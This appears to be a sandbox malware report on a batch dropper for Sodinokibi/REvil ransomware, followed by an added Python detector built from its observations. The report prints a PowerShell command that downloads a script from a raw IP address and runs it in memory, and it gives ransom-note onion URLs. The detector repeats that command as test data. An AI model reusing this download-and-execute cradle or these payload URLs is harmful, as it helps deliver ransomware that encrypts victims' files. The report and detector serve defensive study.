Analysis

max time kernel: 48s
max time network: 48s
platform: windows7_x64
resource: win7v200722
submitted: 22-08-2020 07:10

Static task: static1
Behavioral task: behavioral1
  Sample: d011698f0a0292375484c2ce503fd5f4.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: d011698f0a0292375484c2ce503fd5f4.bat
  Resource: win10

General

Target: d011698f0a0292375484c2ce503fd5f4.bat
Size: 221B
MD5: 2620ae9cab8fc22007e8184ba8972c49
SHA1: fa1095550cb3150a7cadd676bb594e5c60060a2c
SHA256: 6031919615418117acd8af53074b43ca886e452074663ea10765ae56ff83b813
SHA512: 8a2b0c4537d60159956ce3edf73f136ee9bd2c7194b0a0dbed17c234df0a8bb5a0effb21752bd9d6d5c7b87e43ae50f7e6fb58e613a9e61533b0b7274dfe8ebe
Malware Config

Extracted
  URL: http://185.103.242.78/pastes/d011698f0a0292375484c2ce503fd5f4

Extracted
  Path: C:\ae5ba-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A11937213753CE2
    http://decryptor.cc/3A11937213753CE2
Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (1 IoC)
  powershell.exe: flow 3, pid 620

Modifies extensions of user files (6 IoCs)
Ransomware generally changes the extension on encrypted files.
  powershell.exe:
    File opened for modification: \??\c:\users\admin\pictures\SearchSet.tiff
    File renamed: C:\Users\Admin\Pictures\JoinUninstall.tiff => \??\c:\users\admin\pictures\JoinUninstall.tiff.ae5ba
    File renamed: C:\Users\Admin\Pictures\DisconnectInstall.raw => \??\c:\users\admin\pictures\DisconnectInstall.raw.ae5ba
    File renamed: C:\Users\Admin\Pictures\SearchSet.tiff => \??\c:\users\admin\pictures\SearchSet.tiff.ae5ba
    File renamed: C:\Users\Admin\Pictures\WaitGroup.tif => \??\c:\users\admin\pictures\WaitGroup.tif.ae5ba
    File opened for modification: \??\c:\users\admin\pictures\JoinUninstall.tiff

Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 5 IoCs)
  vssvc.exe:
    Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
    Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
    Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
    Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
    Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  powershell.exe:
    Set value (str): \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gcn99c9mo7e.bmp"

Drops file in Program Files directory (37 IoCs)
  powershell.exe:
    File opened for modification: \??\c:\program files\CompareCompress.tiff
    File opened for modification: \??\c:\program files\ConvertToDisable.mp4v
    File opened for modification: \??\c:\program files\RedoResolve.wm
    File opened for modification: \??\c:\program files\UnblockMove.potm
    File opened for modification: \??\c:\program files\GrantConvertTo.ram
    File opened for modification: \??\c:\program files\RequestDebug.otf
    File opened for modification: \??\c:\program files\FindUnpublish.mov
    File opened for modification: \??\c:\program files\InvokeLimit.bmp
    File opened for modification: \??\c:\program files\PushSuspend.wmf
    File opened for modification: \??\c:\program files\ResolveUnprotect.xltm
    File opened for modification: \??\c:\program files\WaitRevoke.xla
    File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ae5ba-readme.txt
    File created: \??\c:\program files\ae5ba-readme.txt
    File opened for modification: \??\c:\program files\EnterUnlock.m3u
    File opened for modification: \??\c:\program files\RedoComplete.vssx
    File opened for modification: \??\c:\program files\StepSave.png
    File opened for modification: \??\c:\program files\CloseDisconnect.wvx
    File opened for modification: \??\c:\program files\CloseRepair.avi
    File opened for modification: \??\c:\program files\CompleteConvert.emf
    File opened for modification: \??\c:\program files\CompressOpen.3gpp
    File opened for modification: \??\c:\program files\EnableAdd.dib
    File opened for modification: \??\c:\program files\MeasureSwitch.txt
    File opened for modification: \??\c:\program files\SearchUnprotect.pps
    File opened for modification: \??\c:\program files\CompareDeny.wma
    File opened for modification: \??\c:\program files\FindSelect.M2T
    File opened for modification: \??\c:\program files\RemoveWrite.mp4v
    File opened for modification: \??\c:\program files\UndoResolve.m1v
    File opened for modification: \??\c:\program files\ConfirmTest.pps
    File opened for modification: \??\c:\program files\ConvertDisconnect.pub
    File opened for modification: \??\c:\program files\FormatRedo.easmx
    File opened for modification: \??\c:\program files\FormatSet.scf
    File created: \??\c:\program files\microsoft sql server compact edition\ae5ba-readme.txt
    File created: \??\c:\program files (x86)\ae5ba-readme.txt
    File opened for modification: \??\c:\program files\AssertOpen.kix
    File opened for modification: \??\c:\program files\CheckpointCompare.wmx
    File opened for modification: \??\c:\program files\UnregisterAssert.asx
    File created: \??\c:\program files\microsoft sql server compact edition\v3.5\ae5ba-readme.txt

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid 620 powershell.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid 620 powershell.exe (3 entries)

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Token: SeDebugPrivilege, pid 620 powershell.exe
  Token: SeDebugPrivilege, pid 620 powershell.exe
  Token: SeTakeOwnershipPrivilege, pid 620 powershell.exe
  Token: SeBackupPrivilege, pid 1120 vssvc.exe
  Token: SeRestorePrivilege, pid 1120 vssvc.exe
  Token: SeAuditPrivilege, pid 1120 vssvc.exe

Suspicious use of WriteProcessMemory (4 IoCs)
  PID 1264 (cmd.exe) wrote to memory of PID 620 (powershell.exe), 4 entries
Processes

C:\Windows\system32\cmd.exe (PID 1264)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\d011698f0a0292375484c2ce503fd5f4.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 620, child of 1264)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d011698f0a0292375484c2ce503fd5f4');Invoke-HGSGRZQUHJGJQK;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 1120)
  C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
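Added example, not part of this report or of the sample. The process tree above shows a 221-byte batch file whose only job is to start a 32-bit PowerShell host (the SysWOW64 path on an x64 guest) with a download cradle: the script body, including the Invoke-HGSGRZQUHJGJQK entry point, is fetched from the paste URL and executed in memory, and Start-Sleep keeps PID 620 alive. The artifacts left on disk are the .ae5ba renames, the ae5ba-readme.txt notes and the wallpaper BMP in Temp. The Python below turns those observations into detection logic that can be run over process and file events: one check for a PowerShell command line that both downloads and IEX-executes content, one for a single pid appending the same suffix to many files while dropping a readme, and a correlation of the two. All event records are constructed to mirror the report; the record layout, the parent pids 900 and 600, and the benign rename by pid 4000 are assumptions, not data from the page.

```python
"""Detection logic for the two behaviours recorded in the report above:
a PowerShell download-and-execute cradle launched from a batch file, and
one process appending a new extension to many user files while dropping
a ransom note. Event records are constructed, not real Sysmon/EDR output."""
import re
from collections import Counter, defaultdict

# Constructed process-creation events (Sysmon event 1 style) modelled on the
# report's process tree. The parent pids 900 and 600 are assumed.
PROCESS_EVENTS = [
    {"pid": 1264, "ppid": 900, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\d011698f0a0292375484c2ce503fd5f4.bat"'},
    {"pid": 620, "ppid": 1264,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe \"IEX (New-Object System.Net.WebClient).DownloadString("
                 "'http://185.103.242.78/pastes/d011698f0a0292375484c2ce503fd5f4');"
                 "Invoke-HGSGRZQUHJGJQK;Start-Sleep -s 10000\"")},
    {"pid": 1120, "ppid": 600, "image": r"C:\Windows\system32\vssvc.exe",
     "cmdline": r"C:\Windows\system32\vssvc.exe"},
]

# Constructed file events modelled on the "Modifies extensions of user files"
# and "Drops file in Program Files directory" IoCs, plus one benign rename by
# an assumed pid 4000 to show the mass-rename check does not fire on it.
FILE_EVENTS = [
    {"pid": 620, "op": "rename", "src": r"C:\Users\Admin\Pictures\JoinUninstall.tiff",
     "dst": r"C:\Users\Admin\Pictures\JoinUninstall.tiff.ae5ba"},
    {"pid": 620, "op": "rename", "src": r"C:\Users\Admin\Pictures\DisconnectInstall.raw",
     "dst": r"C:\Users\Admin\Pictures\DisconnectInstall.raw.ae5ba"},
    {"pid": 620, "op": "rename", "src": r"C:\Users\Admin\Pictures\SearchSet.tiff",
     "dst": r"C:\Users\Admin\Pictures\SearchSet.tiff.ae5ba"},
    {"pid": 620, "op": "rename", "src": r"C:\Users\Admin\Pictures\WaitGroup.tif",
     "dst": r"C:\Users\Admin\Pictures\WaitGroup.tif.ae5ba"},
    {"pid": 620, "op": "create", "src": None, "dst": r"C:\Program Files\ae5ba-readme.txt"},
    {"pid": 620, "op": "create", "src": None, "dst": r"C:\Program Files (x86)\ae5ba-readme.txt"},
    {"pid": 4000, "op": "rename", "src": r"C:\Users\Admin\Documents\report.docx",
     "dst": r"C:\Users\Admin\Documents\report.docx.bak"},
]

INVOKE_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
URL_RE = re.compile(r'''https?://[^\s'")]+''')
NOTE_RE = re.compile(r"readme\.txt$", re.I)


def find_cradles(events):
    """Flag PowerShell processes whose command line both fetches remote content
    and executes it in memory. Returns (pid, parent image, first URL) tuples."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if "powershell" not in e["image"].lower():
            continue
        if INVOKE_RE.search(e["cmdline"]) and DOWNLOAD_RE.search(e["cmdline"]):
            urls = URL_RE.findall(e["cmdline"])
            parent = by_pid.get(e["ppid"], {}).get("image")
            hits.append((e["pid"], parent, urls[0] if urls else None))
    return hits


def find_mass_rename(file_events, min_renames=4):
    """Group renames by (pid, appended suffix). A pid that appends the same suffix
    to at least min_renames files is reported with any *readme.txt it created;
    the report shows the note named after the suffix (ae5ba-readme.txt), so that
    correlation is flagged too. Paths are compared case-insensitively because
    the report mixes C:\\Users\\... and \\??\\c:\\users\\... spellings."""
    appended = defaultdict(Counter)
    notes = defaultdict(set)
    for ev in file_events:
        dst = ev["dst"].lower()
        if ev["op"] == "rename":
            src = ev["src"].lower()
            if dst.startswith(src + "."):          # original name kept, suffix added
                appended[ev["pid"]][dst[len(src) + 1:]] += 1
        elif ev["op"] == "create" and NOTE_RE.search(dst):
            notes[ev["pid"]].add(dst.rsplit("\\", 1)[-1])
    findings = []
    for pid, suffixes in appended.items():
        for suffix, n in suffixes.items():
            if n >= min_renames:
                dropped = sorted(notes.get(pid, ()))
                findings.append({
                    "pid": pid, "extension": suffix, "renamed": n, "notes": dropped,
                    "note_matches_extension": any(name.startswith(suffix + "-") for name in dropped),
                })
    return findings


def triage(process_events, file_events):
    """Pids flagged by both checks: the same process being the cradle and the
    encryptor is the strongest signal, and is exactly what this report shows."""
    cradle_pids = {pid for pid, _, _ in find_cradles(process_events)}
    rename_pids = {f["pid"] for f in find_mass_rename(file_events)}
    return sorted(cradle_pids & rename_pids)


if __name__ == "__main__":
    for hit in find_cradles(PROCESS_EVENTS):
        print("download cradle:", hit)
    for finding in find_mass_rename(FILE_EVENTS):
        print("mass rename:", finding)
    print("pids hit by both:", triage(PROCESS_EVENTS, FILE_EVENTS))
```

The cradle check matches the IEX/DownloadString pair used here and the common Invoke-WebRequest and DownloadFile variants, but it reads the command line as-is: a `-EncodedCommand` payload has to be base64-decoded before the same regexes apply. `min_renames` is the tuning knob for the rename check; four is enough for the six IoCs in this report but should be raised on hosts where bulk renames are normal.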